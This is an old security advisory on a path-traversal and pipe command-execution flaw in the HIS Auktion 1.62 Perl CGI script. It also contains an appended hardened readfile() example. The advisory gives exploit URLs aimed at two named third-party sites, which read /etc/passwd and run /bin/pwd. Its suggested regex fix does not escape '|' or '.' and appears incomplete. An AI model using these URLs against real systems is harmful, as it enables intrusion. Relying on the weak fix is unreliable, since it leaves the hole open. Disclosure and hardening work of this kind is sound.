-----------UkR security team advisory #8------------
HIS Auktion 1.62: "show files" vulnerability and remote command execution.
--------------------------------------------------

Name:   HIS Auktion 1.62: "show files" vulnerability.
Date:   11.02.2001
Author: UkR-XblP

About:
The script "HIS Auktion 1.62" is a CGI link-catalog script.
The creators' site: http://www.his-software.de

Problem:

-------from auktion.pl-------
sub readfile {
    local($filename)=$_[0];   # taken straight from the "menue" CGI parameter
    local(@array);
    open(f,$filename);        # two-argument open(): the value chooses the mode
                              # (a "|" turns it into a pipe) and the path ("../")
----------------------------

$filename is not filtered for special characters, so any file readable by the
web server can be displayed, and a trailing pipe turns the name into a command.

Exploit:

http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command

FIX:

To fix the bug you need to add a check of the variable $filename to the script.
For example (the pattern is a character class, so each listed character is
escaped individually):

$filename=~s/([\[\]\;\:\/\$\!\&\`\\\(\)\{\}\"])/\\$1/g;

Example:

http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd |
http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
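A hardened readfile() beside the vulnerable shape from the advisory, as an added example that is not the advisory's or HIS-software's code; the menu directory $MENU_DIR and the "name.html" naming convention are assumptions.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;

# Assumed layout (hypothetical): menu pages live in one fixed directory.
my $MENU_DIR = '/var/www/auktion/menue';

# Vulnerable shape described in the advisory: two-argument open() lets the
# caller-supplied value pick both the file (via "../") and the mode (via "|").
sub readfile_unsafe {
    my ($filename) = @_;
    open(my $fh, $filename) or return;
    my @lines = <$fh>;
    close $fh;
    return @lines;
}

# Hardened version: allowlist the name (letters, digits, "_" and "-" plus a
# fixed extension), which rules out "/", "..", ";" and "|" entirely, then
# anchor it inside $MENU_DIR. Returns undef for anything else.
sub safe_menu_path {
    my ($name) = @_;
    return undef unless defined $name;
    return undef unless $name =~ /\A[A-Za-z0-9_-]+\.html\z/;
    return File::Spec->catfile($MENU_DIR, $name);
}

sub readfile_safe {
    my ($name) = @_;
    my $path = safe_menu_path($name);
    die "invalid menu name\n" unless defined $path;
    # Three-argument open with an explicit '<' mode: the path can never be
    # reinterpreted as a pipe, whatever characters it contains.
    open(my $fh, '<', $path) or die "cannot open menu: $!\n";
    my @lines = <$fh>;
    close $fh;
    return @lines;
}

# Show the validator's verdict on the kinds of values the advisory discusses
# (constructed inputs; nothing is opened here).
for my $v ('start.html', '../../etc/passwd', '/bin/pwd |', 'x.html;ls') {
    my $p = safe_menu_path($v);
    printf "%-20s => %s\n", $v, defined $p ? "accepted ($p)" : 'rejected';
}
```

Only start.html is accepted; the three traversal, pipe and separator variants are rejected before any open() call is reached.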